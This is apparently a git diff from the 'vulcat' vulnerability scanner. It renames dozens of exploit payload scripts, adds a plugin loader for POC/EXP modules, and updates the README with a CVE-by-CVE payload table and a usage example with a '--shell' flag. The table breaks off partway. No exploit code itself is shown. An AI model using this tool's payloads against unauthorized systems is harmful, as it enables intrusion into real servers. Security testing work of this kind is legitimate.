payloads/Spring/spring-data-commons-cve-2018-1273-rce.py create mode 100644 payloads/Spring/spring-data-rest-cve-2017-8046-rce.py create mode 100644 payloads/Spring/spring-security-oauth-cve-2016-4977-rce.py delete mode 100644 payloads/Supervisor/cve_2017_11610.py delete mode 100644 payloads/Supervisor/main.py create mode 100644 payloads/Supervisor/supervisor-cve-2017-11610-rce.py delete mode 100644 payloads/ThinkPHP/_2_x_rce.py delete mode 100644 payloads/ThinkPHP/_5_ids_sqlinject.py delete mode 100644 payloads/ThinkPHP/cnnvd_201901_445.py delete mode 100644 payloads/ThinkPHP/cnvd_2018_24942.py delete mode 100644 payloads/ThinkPHP/cnvd_2022_86535.py delete mode 100644 payloads/ThinkPHP/cve_2018_1002015.py delete mode 100644 payloads/ThinkPHP/main.py create mode 100644 payloads/ThinkPHP/main.txt create mode 100644 payloads/ThinkPHP/thinkphp-2.x-rce.py create mode 100644 payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py create mode 100644 payloads/ThinkPHP/thinkphp-cnnvd-201901-445-rce.py create mode 100644 payloads/ThinkPHP/thinkphp-cnvd-2018-24942-rce.py create mode 100644 payloads/ThinkPHP/thinkphp-cnvd-2022-86535-rce.py create mode 100644 payloads/ThinkPHP/thinkphp-cve-2018-1002015-rce.py delete mode 100644 payloads/Ueditor/main.py delete mode 100644 payloads/Ueditor/ssrf.py create mode 100644 payloads/Ueditor/ueditor-ssrf.py create mode 100644 payloads/VMware/test.tar create mode 100644 payloads/VMware/vmware-vcenter-2020-10-fileread.py create mode 100644 payloads/VMware/vmware-vcenter-cve-2021-21972-fileupload-rce.py delete mode 100644 payloads/Weblogic/cve_2014_4210.py delete mode 100644 payloads/Weblogic/cve_2017_10271.py delete mode 100644 payloads/Weblogic/cve_2019_2725.py delete mode 100644 payloads/Weblogic/cve_2020_14750.py delete mode 100644 payloads/Weblogic/cve_2020_14882.py delete mode 100644 payloads/Weblogic/cve_2021_2109.py delete mode 100644 payloads/Weblogic/main.py create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2014-4210-ssrf.py create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2017-10271-unserialize.py create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2019-2725-unserialize.py create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2020-14750-bypass.py create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2020-14882-rce-unauth.py create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2021-2109-rce.py delete mode 100644 payloads/Webmin/cve_2019_15107.py delete mode 100644 payloads/Webmin/cve_2019_15642.py delete mode 100644 payloads/Webmin/main.py create mode 100644 payloads/Webmin/webmin-cve-2019-15107-rce.py create mode 100644 payloads/Webmin/webmin-cve-2019-15642-rce.py delete mode 100644 payloads/Yonyou/cnnvd_201610_923.py delete mode 100644 payloads/Yonyou/cnvd_2021_30167.py delete mode 100644 payloads/Yonyou/main.py delete mode 100644 payloads/Yonyou/nc_fileread.py delete mode 100644 payloads/Yonyou/u8_oa_getsession.py delete mode 100644 payloads/Yonyou/u8_oa_test_sqlinject.py create mode 100644 payloads/Yonyou/yonyou-erp-nc-ncfindweb-fileread.py create mode 100644 payloads/Yonyou/yonyou-grp-u8-cnnvd-201610-923-sqlinject.py create mode 100644 payloads/Yonyou/yonyou-nc-cnvd-2021-30167-rce.py create mode 100644 payloads/Yonyou/yonyou-u8-oa-getsession-dsinfo.py create mode 100644 payloads/Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py delete mode 100644 payloads/Zabbix/cve_2016_10134.py delete mode 100644 payloads/Zabbix/main.py create mode 100644 payloads/Zabbix/zabbix-cve-2016-10134-sqlinject.py delete mode 100644 payloads/demo/main.py delete mode 100644 payloads/demo/scan.py delete mode 100644 payloads/demo/scan_2.py delete mode 100644 payloads/phpMyadmin/cve_2018_12613.py delete mode 100644 payloads/phpMyadmin/main.py create mode 100644 payloads/phpMyadmin/phpmyadmin-cve-2018-12613-fileinclude-fileread.py create mode 100644 payloads/phpMyadmin/phpmyadmin-wooyun-2016-199433-unserialize.py delete mode 100644 payloads/phpMyadmin/wooyun_2016_199433.py delete mode 100644 payloads/phpUint/cve_2017_9841.py delete mode 100644 payloads/phpUint/main.py create mode 100644 payloads/phpUint/phpunit-cve-2017-9841-rce.py delete mode 100644 payloads/uWSGIPHP/cve_2018_7490.py delete mode 100644 payloads/uWSGIPHP/main.py create mode 100644 payloads/uWSGIPHP/uwsgiphp-cve-2018-7490-fileread.py diff --git a/PluginManager.py b/PluginManager.py new file mode 100644 index 0000000..e95064a --- /dev/null +++ b/PluginManager.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +代码来源: https://cloud.tencent.com/developer/article/1567791 +经过一点小修改后, 可用于vulcat +''' + +### 插件式框架 +import os +import sys +from imp import find_module +from imp import load_module +from lib.tool import color + +class PluginManager(type): + #静态变量配置插件路径 + __PluginPath = './payloads/' + + #调用时将插件注册 + def __init__(self, name, bases, dict): + if not hasattr(self,'AllPlugins'): + self.__AllPlugins = {} + else: + self.RegisterAllPlugin(self) + + #设置插件路径 + @staticmethod + def SetPluginPath(path): + if os.path.isdir(path): + PluginManager.__PluginPath = path + else: + print(color.red('The "{PATH}" is not a valid path!!!\n\nPlease check config.yaml'.format(PATH=path))) + print(color.reset()) + os._exit(1) + + @staticmethod + def Whitelist(list, moduleName): + ''' + 检查该模块是否在 提供的白名单中 + 在 -> True + 不在 -> False + ''' + if not list: # * 如果白名单中没有元素, 说明未启用白名单功能, 默认True + return True + + for l in list: + if l in moduleName: + return True + + return False + + #递归检测插件路径下的所有插件,并将它们存到内存中 + @staticmethod + def LoadAllPlugin(vulns = []): + pluginPath = PluginManager.__PluginPath + + if not os.path.isdir(pluginPath): + raise EnvironmentError + # raise EnvironmentError,'%s is not a directory' % pluginPath + + items = os.listdir(pluginPath) + for item in items: + if os.path.isdir(os.path.join(pluginPath, item)): + PluginManager.__PluginPath = os.path.join(pluginPath, item) + PluginManager.LoadAllPlugin(vulns) + else: + if not PluginManager.Whitelist(vulns, item): + continue # * 如果该Payload不在vulns白名单中, 则跳过添加 + + if item.endswith('.py') and item != '__init__.py': + moduleName = item[:-3] + + if moduleName not in sys.modules: + fileHandle, filePath, dect = find_module(moduleName, [pluginPath]) + else: + continue + + try: + moduleObj = load_module(moduleName, fileHandle, filePath, dect) + except Exception as e: + print(color.red('The POC "{NAME}" is Error!!!'.format(NAME=item))) + print(e) + print(color.reset()) + os._exit(1) + finally: + if fileHandle : fileHandle.close() + + #返回所有的插件 + @property + def AllPlugins(self): + return self.__AllPlugins + + #注册插件 + def RegisterAllPlugin(self, aPlugin): + pluginName = '.'.join([aPlugin.__module__,aPlugin.__name__]) + pluginObj = aPlugin() + self.__AllPlugins[pluginName] = pluginObj + + #注销插件 + def UnregisterPlugin(self, pluginName): + if pluginName in self.__AllPlugins: + pluginObj = self.__AllPlugins[pluginName] + del pluginObj + + #获取插件对象。 + def GetPluginObject(self, pluginName = None): + if pluginName is None: + return self.__AllPlugins.values() + else: + result = self.__AllPlugins[pluginName] if pluginName in self.__AllPlugins else None + return result + + #根据插件名字,获取插件对象。(提供插件之间的通信) + @staticmethod + def GetPluginByName(pluginName): + if pluginName is None: + return None + else: + for SingleModel in __ALLMODEL__: + plugin = SingleModel.GetPluginObject(pluginName) + if plugin: + return plugin + +# * 插件框架的接入点。便于管理各个插件。 +# * 各个插件通过继承接入点类,利用Python中metaclass的优势,将插件注册。 +# * 接入点中定义了各个插件模块必须要实现的接口。 +class Vuln_Scan(object, metaclass=PluginManager): + ''' + 漏洞检测 + ''' + def POC(self): + print ('Please write the POC() function') + + def EXP(self): + print ('Please write the EXP() function') + + def Start(self): + print ('Please write the Start() function') + +class Model_Placeholder(object, metaclass=PluginManager): + ''' + 占位 + ''' + def ABCDEFGHIJKLMNOPQRSTUVWXYZ(self): + print ('Please write the ABCDEFGHIJKLMNOPQRSTUVWXYZ() function') + +__ALLMODEL__ = (Vuln_Scan, Model_Placeholder) \ No newline at end of file diff --git a/README.en-us.md b/README.en-us.md index 1f60efd..c84edaf 100644 --- a/README.en-us.md +++ b/README.en-us.md @@ -1,7 +1,7 @@ # vulcat [![python](https://img.shields.io/badge/Python-3-blue?logo=python)](https://shields.io/) -[![version](https://img.shields.io/badge/Version-1.2.0-blue)](https://shields.io/) +[![version](https://img.shields.io/badge/Version-2.0.0-blue)](https://shields.io/) [![license](https://img.shields.io/badge/LICENSE-GPL-yellow)](https://shields.io/) [![stars](https://img.shields.io/github/stars/CLincat/vulcat?color=red)](https://shields.io/) [![forks](https://img.shields.io/github/forks/CLincat/vulcat?color=red)](https://shields.io/) @@ -43,10 +43,10 @@ Usage: python3 vulcat.py Examples: python3 vulcat.py -h python3 vulcat.py --list -python3 vulcat.py -u https://www.example.com/ -o html -python3 vulcat.py -u https://www.example.com/ -a httpd --log 3 -python3 vulcat.py -u https://www.example.com/ -a thinkphp -v cnvd-2018-24942 -python3 vulcat.py -f url.txt --delay 0.5 +python3 vulcat.py -u https://www.example.com/ +python3 vulcat.py -f url.txt -o html +python3 vulcat.py -u https://www.example.com/ -v httpd --log 3 +python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell ``` ## Options @@ -102,10 +102,6 @@ Options: Application: Specify the target type for the scan - -a APPLICATION, --application=APPLICATION - Specifies the target type, for supported frameworks, - see the tips at the bottom, separated by commas (e.g. - thinkphp / thinkphp,weblogic) (default: auto) -v VULN, --vuln=VULN Specify the vulnerability number,With -a/--application to scan a single vulnerability,You can use --list to @@ -149,15 +145,6 @@ Options: Vulnerability list --list View all payload - - Supported target types(Case insensitive): - airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, - confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, - flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, - jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, - mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, - rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, - tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix ``` ## language @@ -190,176 +177,182 @@ ceye-token: Null 2. Then follow the tips in demo.py to fill in your own code and introduce POC into vulcat -## Vulnerabilitys List +## Payloads List
-The current web vulnerabilities that support scanning: [Click on] +vulcat Payloads List: [Click on] ``` -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Target | Vuln id | Vuln Type | Sh | Description | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Alibaba Druid | (None) | unAuth | - | Alibaba Druid unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Alibaba Nacos | CVE-2021-29441 | unAuth | - | Alibaba Nacos unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Airflow | CVE-2020-17526 | unAuth | - | Apache Airflow Authentication bypass | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX default access token | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Druid | CVE-2021-25646 | RCE | Y | Apache Druid Remote Code Execution | -| Apache Druid | CVE-2021-36749 | FileRead | Y | Apache Druid arbitrary file reading | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Flink | CVE-2020-17519 | FileRead | Y | Apache Flink Directory traversal | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Hadoop | (None) | unAuth | - | Apache Hadoop YARN ResourceManager unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF | -| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 Directory traversal | -| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 Directory traversal | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQLinject | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Solr | CVE-2017-12629 | RCE | - | Solr Remote code execution | -| Apache Solr | CVE-2019-17558 | RCE | Y | Solr RCE Via Velocity Custom Template | -| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/FileRead | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Tomcat | CVE-2017-12615 | FileUpload | - | Put method writes to any file | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Apache Unomi | CVE-2020-13942 | RCE | Y | Apache Unomi Remote Express Language Code Execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb Authentication bypass | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence any file include | -| Atlassian Confluence | CVE-2019-3396 | FileRead | Y | Confluence Directory traversal && RCE | -| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence OGNL expression command injection | -| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | - | Cisco ASA/FTD XSS | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Discuz | wooyun-2010-080723 | RCE | Y | Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | - | Django debug page XSS | -| Django | CVE-2018-14574 | Redirect | - | Django CommonMiddleware URL Redirect | -| Django | CVE-2019-14234 | SQLinject | - | Django JSONfield SQLinject | -| Django | CVE-2020-9402 | SQLinject | - | Django GIS SQLinject | -| Django | CVE-2021-35042 | SQLinject | - | Django QuerySet.order_by SQLinject | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQLinject | -| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML Remote code execution | -| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 Remote code execution | -| Drupal | CVE-2018-7602 | RCE | - | Drupal Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch Remote code execution | -| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy Sandbox to bypass && RCE | -| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch Directory traversal | -| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch Directory traversal | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP Remote code execution | -| F5 BIG-IP | CVE-2022-1388 | unAuth/RCE | Y | BIG-IP Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Fastjson | CNVD-2017-02833 | unSerialize | Y | Fastjson <= 1.2.24 deSerialization | -| Fastjson | CNVD-2019-22238 | unSerialize | Y | Fastjson <= 1.2.47 deSerialization | -| Fastjson | rce-1-2-62 | unSerialize | Y | Fastjson <= 1.2.62 deSerialization | -| Fastjson | rce-1-2-66 | unSerialize | Y | Fastjson <= 1.2.66 deSerialization | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Gitea | (None) | unAuth | - | Gitea 1.4.0 unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth Remote code execution | -| Gitlab | CVE-2021-22214 | SSRF | Y | Gitlab CI Lint API SSRF | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| GoCD | CVE-2021-43287 | FileRead | Y | GoCD Business Continuity FileRead | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x Directory traversal | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Influxdb | (None) | unAuth | - | influxdb unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| JBoss | (None) | unAuth | - | JBoss unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Jenkins | CVE-2018-1000861 | RCE | Y | jenkins Remote code execution | -| Jenkins | (None) | unAuth | Y | Jenkins unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Jetty | CVE-2021-28164 | DSinfo | - | jetty Disclosure information | -| Jetty | CVE-2021-28169 | DSinfo | - | jetty Servlets ConcatServlet Disclosure information | -| Jetty | CVE-2021-34429 | DSinfo | - | jetty Disclosure information | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Joomla | CVE-2017-8917 | SQLinject | - | Joomla3.7 Core com_fields SQLinject | -| Joomla | CVE-2023-23752 | unAuth | - | Joomla unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Jupyter | (None) | unAuth | - | Jupyter unAuthorized | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | - | request_uri SSRF | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | Landray-OA FileRead/SSRF | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd FileRead | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| mongo-express | CVE-2019-10758 | RCE | Y | Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum Remote code execution | -| Nexus Repository | CVE-2019-7238 | RCE | Y | 3.x Remote code execution | -| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475 Bypass | -| Nexus Repository | CVE-2020-10199 | RCE | Y | 3.x Remote code execution | -| Nexus Repository | CVE-2020-10204 | RCE | Y | 3.x Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js Directory traversal | -| Nodejs | CVE-2021-21315 | RCE | Y | Node.js Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED Directory traversal | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php Deserialization | -| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 Remote File Inclusion | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails Directory traversal | -| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails FileRead | -| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc writes to any file | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 Remote Command Execution | -| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest Remote Command Execution | -| Spring | CVE-2018-1273 | RCE | Y | Spring Data Commons Remote Command Execution | -| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud Directory traversal | -| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot Directory traversal | -| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl Remote code execution | -| Spring | CVE-2022-22963 | RCE | Y | Spring Cloud Function SpEL Remote code execution | -| Spring | CVE-2022-22965 | RCE | - | Spring Framework Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Supervisor | CVE-2017-11610 | RCE | - | Supervisor Remote Command Execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x Remote code execution | -| ThinkPHP | CNVD-2018-24942 | RCE | Y | The forced route is not enabled RCE | -| ThinkPHP | CNNVD-201901-445 | RCE | Y | Core class Request Remote code execution | -| ThinkPHP | CNVD-2022-86535 | RCE | - | ThinkPHP "think-lang" Remote code execution | -| ThinkPHP | rce-2-x | RCE | - | ThinkPHP2.x Remote code execution | -| ThinkPHP | ids-sqlinject-5 | SQLinject | - | ThinkPHP5 ids SQLinject | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Ueditor | (None) | SSRF | - | Ueditor SSRF | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| uWSGI-PHP | CVE-2018-7490 | FileRead | Y | uWSGI-PHP Directory traversal | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic SSRF | -| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder deSerialization | -| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async deSerialization | -| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic Authentication bypass | -| Oracle Weblogic | CVE-2020-14882 | RCE | Y | Weblogic Unauthorized command execution | -| Oracle Weblogic | CVE-2021-2109 | RCE | - | Weblogic LDAP Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth Remote code execution | -| Webmin | CVE-2019-15642 | RCE | Y | Webmin Remote code execution | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Yonyou | CNNVD-201610-923 | SQLinject | - | Yonyou-GRP-U8 Proxy SQLinject | -| Yonyou | CNVD-2021-30167 | RCE | Y | Yonyou-NC BeanShell Remote code execution | -| Yonyou | nc-fileread | FileRead | - | Yonyou-ERP-NC NCFindWeb Directory traversal | -| Yonyou | u8-oa-getsession | DSinfo | - | Yonyou-U8-OA getSessionList.jsp Disclosure info | -| Yonyou | u8-oa-test-sql | SQLinject | - | Yonyou-U8-OA test.jsp SQLinject | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -| Zabbix | CVE-2016-10134 | SQLinject | - | latest.php or jsrpc.php SQLinject | -+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ -vulcat-1.2.0/2023.03.01 -108/Poc -54/Shell ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| Payloads | Sh | Description | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| 74cms-v5.0.1-sqlinject | - | v5.0.1 AjaxPersonalController.class.php SQLinject | +| 74cms-v6.0.4-xss | - | v6.0.4 help center search box-XSS | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| alibaba-druid-unauth | - | Alibaba Druid unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| alibaba-nacos-cve-2021-29441-unauth | - | Alibaba Nacos unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-airflow-cve-2020-17526-unauth | - | Apache Airflow Authentication bypass | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-apisix-cve-2020-13945-unauth | - | Apache APISIX default access token | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-druid-cve-2021-25646-rce | Y | Apache Druid Remote Code Execution | +| apache-druid-cve-2021-36749-fileread | Y | Apache Druid arbitrary file reading | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-flink-cve-2020-17519-fileread | Y | Apache Flink Directory traversal | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-hadoop-unauth | - | Apache Hadoop YARN ResourceManager unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-httpd-cve-2021-40438-ssrf | - | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| apache-httpd-cve-2021-41773-rce-fileread | Y | Apache HTTP Server 2.4.49 Directory traversal | +| apache-httpd-cve-2021-42013-rce-fileread | Y | Apache HTTP Server 2.4.50 Directory traversal | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-skywalking-cve-2020-9483-sqlinject | - | SkyWalking SQLinject | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-solr-cve-2017-12629-rce | - | Solr Remote code execution | +| apache-solr-cve-2019-17558-rce | Y | Solr RCE Via Velocity Custom Template | +| apache-solr-cve-2021-27905-ssrf-fileread | Y | Solr SSRF/FileRead | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-tomcat-cve-2017-12615-fileupload | - | Put method writes to any file | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| apache-unomi-cve-2020-13942-rce | Y | Apache Unomi Remote Express Language Code Execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| appweb-cve-2018-8715-unauth | - | AppWeb Authentication bypass | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| atlassian-confluence-cve-2015-8399-fileread-fileinclude | Y | Confluence any file include | +| atlassian-confluence-cve-2019-3396-fileread | Y | Confluence Directory traversal && RCE | +| atlassian-confluence-cve-2021-26084-rce | Y | Confluence OGNL expression command injection | +| atlassian-confluence-cve-2022-26134-rce | Y | Confluence Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| cisco-cve-2020-3580-xss | - | Cisco ASA/FTD XSS | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| discuz-wooyun-2010-080723-rce | Y | Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| django-cve-2017-12794-xss | - | Django debug page XSS | +| django-cve-2018-14574-redirect | - | Django CommonMiddleware URL Redirect | +| django-cve-2019-14234-sqlinject | - | Django JSONfield SQLinject | +| django-cve-2020-9402-sqlinject | - | Django GIS SQLinject | +| django-cve-2021-35042-sqlinject | - | Django QuerySet.order_by SQLinject | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| drupal-cve-2014-3704-sqlinject | - | Drupal < 7.32 Drupalgeddon SQLinject | +| drupal-cve-2017-6920-rce | - | Drupal Core 8 PECL YAML Remote code execution | +| drupal-cve-2018-7600-rce | Y | Drupal Drupalgeddon 2 Remote code execution | +| drupal-cve-2018-7602-rce | - | Drupal Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| elasticsearch-cve-2014-3120-rce | Y | ElasticSearch Remote code execution | +| elasticsearch-cve-2015-1427-rce | Y | ElasticSearch Groovy Sandbox to bypass && RCE | +| elasticsearch-cve-2015-3337-fileread | Y | ElasticSearch Directory traversal | +| elasticsearch-cve-2015-5531-fileread | Y | ElasticSearch Directory traversal | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| f5bigip-cve-2020-5902-rce-fileread | - | BIG-IP Remote code execution | +| f5bigip-cve-2022-1388-unauth-rce | Y | BIG-IP Authentication bypass RCE | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| fastjson-cnvd-2017-02833-rce | Y | Fastjson <= 1.2.24 deSerialization | +| fastjson-cnvd-2019-22238-rce | Y | Fastjson <= 1.2.47 deSerialization | +| fastjson-v1.2.62-rce | Y | Fastjson <= 1.2.62 deSerialization | +| fastjson-v1.2.66-rce | Y | Fastjson <= 1.2.66 deSerialization | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| gitea-unauth-fileread-rce | - | Gitea 1.4.0 unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| gitlab-cve-2021-22205-rce.py | - | GitLab Pre-Auth Remote code execution | +| gitlab-cve-2021-22214-ssrf | Y | Gitlab CI Lint API SSRF | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| gocd-cve-2021-43287-fileread | Y | GoCD Business Continuity FileRead | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| grafana-cve-2021-43798-fileread | Y | Grafana 8.x Directory traversal | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| influxdb-unauth | - | influxdb unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| jboss-unauth | - | JBoss unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| jenkins-cve-2018-1000861-rce | Y | jenkins Remote code execution | +| jenkins-unauth | Y | Jenkins unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| jetty-cve-2021-28164-dsinfo | - | jetty Disclosure information | +| jetty-cve-2021-28169-dsinfo | - | jetty Servlets ConcatServlet Disclosure information | +| jetty-cve-2021-34429-dsinfo | - | jetty Disclosure information | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| joomla-cve-2017-8917-sqlinject | - | Joomla3.7 Core com_fields SQLinject | +| joomla-cve-2023-23752-unauth | - | Joomla unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| jupyter-unauth | - | Jupyter unAuthorized | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| keycloak-cve-2020-10770-ssrf | - | request_uri SSRF | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| landray-oa-cnvd-2021-28277-ssrf-fileread | Y | Landray-OA FileRead/SSRF | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| 